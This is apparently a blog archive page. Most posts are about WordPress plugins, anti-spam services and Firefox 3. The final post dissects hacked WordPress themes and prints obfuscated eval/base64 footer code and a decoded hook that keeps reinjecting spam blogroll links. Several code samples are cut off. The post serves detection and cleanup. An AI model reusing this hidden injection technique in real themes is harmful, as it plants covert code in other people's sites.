Quick Tip: curreX version 0.9 released (with Flash Widget support)

Another quick announcement. I just released another version (0.9) of curreX – the Ajax based Currency Converter widget for WordPress.

Starting from this version, curreX also includes a Flash based widget and provides you with the option of selecting between the HTML/JavaScript version and it’s Flash counterpart from the widget configuration panel of WordPress.

A quick preview of the flash widget can be obtained from here. I’m pretty bad at creating snazzy graphics in flash – so it’s going to take a while to make the widget look nice. The current version is fully functional though.

As always, I’m open for any questions / comments / bug reports.

Quick Tip: curreX v0.8 released

Here’s a quick tip for those who have been plagued with problems while using curreX v0.7 (the Ajax based Currency Converter Widget for WordPress). I’ve released a new version v0.8 yesterday, fixing most of those issues.

Please grab a copy from here or the WordPress plug-in repository and update your installation to fix all the earlier problems.

If you run into any problems with this version, there’s always the official curreX support forum.

Decided to give Defensio Anti-Spam a shot… over Akismet

Fighting SpamRight since the beginning of my blogging career, I’ve been using Akismet in conjuction with Bad Behavior to weed out spam from my blog. Akismet is as a natural choice since it comes parcelled with WordPress installations. As for Bad Behavior, I decided to use it after reading plenty of articles on effective spam filtering.

Akismet has worked just fine for me so far. It has it’s occasional false positives (marking legit. comments as spam) – but I’m all right with it, since I don’t get much of spam everyday (at the most a 100). While Akismet may be very good at catching spam, there’s one quarter it needs to be revamped big time. The list of spams in Akismet is presented in a paginated manner while displaying the full body of each spam, making the list unnecessarily large and extremely tedious to go through. As I mentioned earlier – I don’t receive much of spam everyday. So, it’s relatively easy for me to wade through the list and pick-out any false positives. However, imagine what a pain it must be for the larger blogs receiving thousands of spam comments everyday. There are big chances of a good amount of legitimate comments going down the drain along with the spam flood. To make the situation worse, lately there have been a lot of complaints about Akismet producing more and more false positives.

Defensio LogoAfter going through a bunch of reviews – both positive and negative, I decided to go ahead and give Defensio a try. For those who didn’t know, Defensio is a community-based anti-spam service similar to Akismet – but with certain added enhancements. They offer anti-spam solutions for a wide range of blogging platforms. It’s free for personal use while for commercial usage a nominal charge is levied on a per month basis.

Defensio sorts your quarantined comments by their “spaminess” value. This means that finding the occasional legitimate comment buried in your spambox (aka false positive) becomes dead easy: with Defensio you simply need to monitor the top portion of your quarantine to be confident that there’s no ham amongst your spam.

After I installed this plug-in, the first few spams that were caught were arranged into two distinct groups – Somewhat Spammy and Moderately Spammy. I’m yet to see the Super Spams… but I get the general idea.

A really nice feature of Defensio is that only the first line of the spam comment is shown (along with a link to display the full content). This makes for much better readability and sifting through the list. If you recall, I was grumbling about the lack of this in Akismet towards the beginning of this post. Score 1 for Defensio.

Before I forget, I’d like to mention one more contrasting point. When I had first installed Akismet and got my API key from WordPress.com, it gave me an insane amount of trouble to validate the key. This has been the same for any new blog I’ve helped install. For some reason, the validation wouldn’t go through for at least an hour following the registration at WordPress.com. However, with Defensio it was just click-and-go. Score 2.

Another distinct advantage of Defensio is that apart from the community anti-spam fighting feature, it operates on a blog-to-blog level.

This means that no two bloggers will see Defensio react in precisely the same way, even for similar comments, which is a good thing – because one person’s ham might be another person’s spam. And our continuously evolving set of algorithmic tricks ensures that we’ll never let spammers gain the upper hand.

Also available are RSS feeds of your comments and spam – which makes the monitoring less painful by curtailing the need to login into the Admin Panel on a regular basis. The Defensio site keeps track of your spam statistics and presents nicely decked-up charts that summarizes the evolution of spam and performance on your blog – a cool eye-candy feature to while your time away and “satisfy your inner bean-counter“.

Keep in mind, this is NOT an Akismet bashing post. I really respect the work of Matt and his team. They are the pioneers in this and without them – more than 80% of the WordPress based blogs wouldn’t see through a single day of Spam Attack. However, Defensio does offer a wider range of tools and features and that makes it a more viable option.

Now all I got to see is how well it handles my spam. On the initial try, it did get two false negatives – i.e. spam comments which passed through as legitimate ones. But since this is its teething phase, I’m going to overlook that and give it a chance to evolve according to my comment preferences. Will report back in a couple of weeks time (or two) on how well it’s performing.

How about a personalised Firefox 3 Download Day Certificate?

Hopefully, by now you’ve grabbed your copy of Firefox 3 and consequently played an active role in helping our favourite browser set a new Guinness World Record. Here’s an added perk for being such an avid follower of Firefox – a personalised Firefox 3 Download Day Certificate stating your role in helping Firefox achieve the world record. I got mine just now and here’s what it looks like…

Firefox 3 Download Day Certificate

Getting the certificate is as easy as filling up this form (with just your name) and grabbing the generated PDF File.

Incidentally, I managed to grab my copy of Firefox 3 only today morning – almost 12 hours after the official release. Last night it was literally impossible to access any of the Firefox download sites due to the initial download rush.

Installation went smoothly and all my earlier settings & bookmarks were preserved – though a couple of extensions failed to work (Fasterfox, FEBE and TabMixPlus). None that I will sorely miss, (for the time being) except  for FEBE.  On the good side, FF3 DOES take a shorter time to fire-up. How about you? How was your initial experience with FF3?

Hurry… Get a Free Membership at a Premium WordPress Themes Club

WPDesigner Premium WordPress Themes Club - Free Membership

BlogAdda – an Indian blog showcase (directory) is giving away 100 free memberships to the Premium WordPress Themes Club of WPDesigner.

Normally, a one year membership of the club costs you $5, for which you get access to 12 premium themes (1 every month). As long as the offer from BlogAdda stands, you can get this for free. No sign-ups with BlogAdda are required. Simply read this post at the BlogAdda Blog, and leave a comment there stating your name & email correctly and include a link to the most popular post on your own blog.

They’ll get back to you in a day or two with a promotional code which you can use at the WPDesigner site to alleviate the charges for the first year.

Alternatively, you can follow BlogAdda on Twitter to claim your free membership.

I had left a comment there yesterday and by today noon I had my promotional code delivered to me. Last I checked, they have around 48 comments on that post (including comments from those who’re following BlogAdda on Twitter). If you hurry, you may still be accommodate in the last 50….

LC ISO Creator: Probably the smallest (and portable) no-frills ISO maker

Here’s a quick pointer. If you want an CD/DVD ISO Image Creator that does just what it’s intended to do, you should try this fantastic freeware named LC ISO Creator.

It’s this incredibly tiny download (14kb compressed) and runs straight out of box – i.e. no installation is required. It doesn’t require any crappy driver installation either. This can make it an invaluable addition to the PortableApps Suite.

LCISOCreator Screenshot

The interface is very minimalistic and doesn’t sport any Settings or Options dialog. It took me around 9 minutes to convert a 3GB DVD into it’s ISO counterpart – pretty good for such compact coding. It even support Unicode. Your only qualm might be that it cannot handle copy-protected disks. Who cares! There are plenty of specialised tools for that.

This one’s headed straight for my PortableApps folder on my USB key.

Your last chance to help Firefox set a new Guiness World Record

Firefox 3For those who didn’t know, the guys at Mozilla are reaching out for a new Guinness World Record for the most downloaded software in a span of 24 hours – with the support of it’s million plus fan base.

The software which will strive for this record is the all new Firefox 3 (with more than 15,000 improvements), which is being launched on the 17th of June, 2008, i.e. tomorrow. This day has been named the Download Day and the guys at Mozilla want to see the download counter shooting through the roof, far surpassing the 2 million plus downloads of Firefox 2.

In the wake of this launch, quite a few authors have updated their extensions to work smoothly with this new release (for example, Google Toolbar). That’ll ensure that you aren’t left stranded with just the browser minus all the enhanced functionality.

If you’re a fanatical Firefox follower (like me), make sure you drop by the Firefox 3 Headquarters and pledge yourself for the download. They’ve got this cool interactive flash-based World Map there, displaying the number of pledges on a per country basis.

Chaotica: New theme for Chaos Laboratory

Finally got around to doing something that has been pending for ages… i.e. give the site it’s own look & feel.

There are plenty of good WordPress themes around – but almost all are overused. I needed something fresh and unique (if possible). I had contacted a few designers but their starting prices ranged $300 to $400 – something that I would rather spend on getting better hosting (dedicated server maybe) or on advertising. In the end, what had to be done – had to be done. Got down on my hands and knees and started designing one on my own.

Adobe (formerly Macromedia) Fireworks helped me a long way in designing all the graphics for the theme. Thanks to Twitch for the logo (lab flasks) – that really brightened up the page.

Once the initial issues with the CSS were sorted out, it was time to port it to WordPress. That was the easier part though and you can see the result proudly on display here. Incidentally, I decided to name it “Chaotica”. Yeah, I know – it’s pretty cliche. But that’s the best I could come up keeping at par with my site name. Maybe you can suggest a better alternative for me!

There are plenty of “cool stuff” that I’m yet to implement – but whatever I’ve put up so far isn’t bad for a first-timer ! What do you say ?

Been busy designing a new theme for Chaos Laboratory

A quick note to everyone… I’m coming up with a leaner and meaner theme for Chaos Laboratory. I’m almost done. Should be able to unleash it in a day …or two, at the most. Learnt a hell lot in the process – both CSS and WordPress Theme design wise – not to mention, bending some popular plug-ins to work the way I want.

My own plug-ins – namely, LiveSig and curreX are both in need of critical updates which I plan to do over the weekend. Till then 🙂

Dissection of a hacked WordPress Theme (how the hacked themes inject links and how to detect them)

Hacked WordPressWhile I was away on my sabbatical (read coping with the all-new fatherhood), I occasionally managed to catch a glimpse of the latest action dramas unfolding on the net – primarily because the WordPress dashboard made it a point to present them to me on a daily basis. One of them caught my fancy and I decided to take a deeper look. The topic was Technorati & hacked WordPress blogs. More than Technorati, it was the article on Weblog Tools Collection that got me wondering…

The premises

While I had made it a point to keep abreast with the WordPress releases and firmly believed that my blog wasn’t affected by this, I wasn’t quite so sure about a couple of other blogs that I had installed for my friends / clients. Going through a few of them, I noticed that all of them had a profuse amount of random & unrelated links in their footer besides containing links to a group of common sites in their blogroll. While the footer links were more or less random (and still acceptable), I couldn’t believe that, strangers as they were, all my friends & clients had managed to put their heads together and point to the same group of sites! Naturally, I got asking and found out that none of them had ever added those links in person and that even they were confused as to where they came from. Being new to blogging most of them had taken it for granted that those links were a part of the WordPress ring and had been placed there as a reciprocating gesture for providing such a terrific blogging platform for free.

The investigation

My first step was to dig into the file footer.php, where I encountered this strange sequence of code. Here’s an example…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
eval(gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96))); ?>

Looks scary, doesn’t it? 😀 Managed to give me a fright at the first sight too. Whereas, I was expecting a bunch of hard-coded links, you get this!! Fear not. A second glance will tell you that the code isn’t really as mambo-jambo-ish as it looks. It contains 2 distinct php statements. The first one is simply the assignment of the scrambled sequence of characters to a horribly named variable i.e. $Gdb63b0c686622a27d0bdb237219e0e96.

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/

This statement alone didn’t make much sense though. It was the second statement, with it’s share of nested functions, that started shedding light on the whole issue…


If you’re familiar with php even a bit, you’ll begin to realise that this statement decodes whatever nastiness is lurking in the first line and helps executing it using the eval() statement. Prior to that, the code has been base64 encoded (the same encoding that is applied to email attachments) and then gzipped – if you follow the order of decoding.

To really get behind the mystery code, you need to be able to SEE it. Rather simple. Just replace the eval() statement with an echo and it’ll spit the code out onto your screen instead of executing it. Following that, we modify the code block to look like this…

< ?php $Gdb63b0c686622a27d0bdb237219e0e96='jZNNa9wwEIbPXch/
echo gzinflate(base64_decode($Gdb63b0c686622a27d0bdb237219e0e96));

Save this code in a new php file and execute it from your local php-enabled web-server installation (in my case XAMPP) and here’s what you get…


< ?php wp_footer(); ?>

Pretty much, the kind of code you’d expect in a WordPress theme footer. While one can accept the link to http://wordpressthemes.weblogs.us as the default link to the theme hosting service, I couldn’t understand what Vacation Reality had to do with it. Still, so much for the footer. All I had to do now, was to remove the whole block of code and create a clean footer as specified by my clients.

The second complaint was regarding those common links that kept appearing in the blogroll. As it turned out, some of my clients had tried deleting those links only to have them re-appear a couple of hours down the line. Time to investigate again. This time it was the file, functions.php. Didn’t have to look far. A search for the terms eval andbase64 got me to the desired point. Once again I faced a block of code that went like…

< ?php }

Taking the same road as the first time fetched me this very interesting block of code..

function insert_theme_link() {
    global $wpdb;
    if($wpdb->get_var("SELECT COUNT(link_id) FROM $wpdb->links WHERE link_url='http://www.wordpresssupplies.com'")==0)
        wp_insert_link(array("link_name" => "Wordpress Themes", "link_url" => "http://www.wordpresssupplies.com" ));

The code should be fairly self-explanatory. What we have is a function named insert_theme_link that adds a link to wordpresssupplies.com to your blogroll (contained in the table wp_links in the WordPress database), if the link isn’t present. The noteworthy line here is add_action( "edit_post","insert_theme_link" ).

The add_action function is a plug-in API hook for WordPress.

  • The first parameter dictates which WordPress action to hook or watch out for.
  • The second parameter is the name of the function that is called when the hooked action occurs.

In our case, the action is edit_post, i.e. whenever the blog author edits a post, the function that adds the link to the blogroll is executed. Hence the mysteriously re-appearing link !

The nexus

W A R N I N G!Hot on the track, I decided to follow the link that was being injected here.. i.e. wordpresssupplies.com – just to make sure this wasn’t a random case and I am not tarnishing their reputation anyhow by unjustifiably pointing fingers at them. I dropped by their site and picked 3-4 themes from different categories. And what do I find? Every single one of them contained similar code – both in the footer as well as the functions.php. Not just that – studying the links led me to two other sites teeming with hacked themes. For your convenience (and warning) I’m listing them here.

  • http://www.amazingwordpressthemes.com/
  • http://wordpressthemes.weblogs.us/

All of them are nicely decked-up and look like legit. WordPress theme sites. But be wary of any themes that you download and use from these sites for they’re certain to contain such code blocks. Apart from these links, you may also notice some other random links being injected – links to car loan sites, cheap dedicated servers etc. – shady businesses which have probably paid the hacked theme sites to insert their links and thus gain PR (pagerank) out of millions of unsuspecting sites utilising these themes.

I tried doing WHOIS on these domains, but that’s where I met-up with a wall. They’re either cloaked with Privacy Protect or contain spurious information regarding their owners. But I have a feeling that under the hood, these spammers (I prefer the term spammers here to hackers – as the people who’ve injected this code into the theme are nothing but link spammers) belong to the same group or it’s the work of a lone individual.

The Philippino blogger Yuga, outlines a couple of other methods followed by these spammers to capture / break your WordPress installation. The article is a must read.

The conclusion

On a sidenote, these themes can still be used if you carefully snip the spammy code out. Normally, the code-block in functions.php can be entirely eliminated without affecting the theme at all. As for the ones in footer.php, you’ll have to study the underlying code and eliminate the links to these sites, keeping the rest.

For those who want to experiment with such themes, I’m listing a few here for direct downloads. Disabling these themes or switching to another one will (normally) get rid of the injector code – but even then, USE AT YOUR OWN RISK.


[download id=7,8,9]

If you manage to dig-up any other hacked theme sites like these, make sure you leave a comment enlisting them. It’ll serve as a warning note to all those who read this. And of course, if you have any thoughts to share on this issue, feel free…